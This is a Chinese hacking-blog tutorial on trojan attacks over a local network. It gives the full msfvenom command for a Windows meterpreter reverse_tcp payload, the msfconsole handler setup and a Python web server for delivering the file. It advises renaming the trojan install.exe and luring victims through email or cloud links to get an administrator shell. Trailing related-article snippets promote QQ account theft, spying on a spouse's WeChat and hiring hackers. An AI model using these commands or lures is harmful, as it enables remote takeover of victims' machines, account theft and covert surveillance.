基于局域网渗透攻击之木马攻击

访客4年前黑客文章1042

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)3.实施攻击操作4.kali攻击机将木马文件拷贝到指定目录5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 806.查看被攻击者的IP地址详情

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是更高administrator权限原文链接

相关文章

pr60帧怎么渲染

开启pr,导进一段视频素材,选定时间线上的视频素材,鼠标点击点一下速率/延迟时间,将速率调快到百分之六十,時间插值法设定为光流法,明确,设定进行后视頻在播放的时候会全自动补帧,最终导出来视頻就可以。...

找黑客盗号去哪找(qq盗号黑客技术教程)

盗号并不算什么黑客技术,你自己去普通中小学校都可以找到会盗号的人。本回答。盗号高手先qq后付款在线专业qq盗号专家qq怎么盗号教程其他类似。 去黒客动画吧找下热心的黑客高手看看,他们肯定会很热心的帮...

身份证号码可以查跟谁开过宾馆么?盘点三种老婆出轨捉奸在床

婚外情意味着不忠和背叛婚姻。然而,婚外情的发生并非毫无根据。这种情况或多或少会发生在内部和外部环境中。感受爱真的是一件非常混乱的事情。不能简单地根据好坏来判断。也许理性的考虑有助于很好地处理这个棘手的...

入口即化的叉烧肉!谁能想到电饭锅也能做

入口即化的叉烧肉!谁能想到电饭锅也能做

懒人版的叉烧肉,以前从不吃肥肉的我,叉烧这种做法也能多吃几块,瘦肉的部分也非常的醇香,肥肉肥而不腻特别解馋,配上大米饭今天晚上又要吃撑了!     【食材】 五花肉400g、姜2块、葱3根...

什么软件能看老婆微信,老婆微信聊天同步接收

电子邮箱使用,特别是应用于商务办公中,在邮件收发时不小心删除了邮件怎么恢复呢?TOM收费邮箱的数据恢复功能可以在找回30天内彻底删除的邮件,只需要一键开启即可直接使用了。...

编程语言学哪个好,软件红包黑客联系方式,找黑客大户追款

点下面红圈里的图标进行诈骗目标挑选,左面选网关(2.43.1),右边选诈骗目标(10.2.43.107),能够挑选多台主机进行诈骗。 Testing:当程序得到了列表中主机的网络管理员账号时,Cred...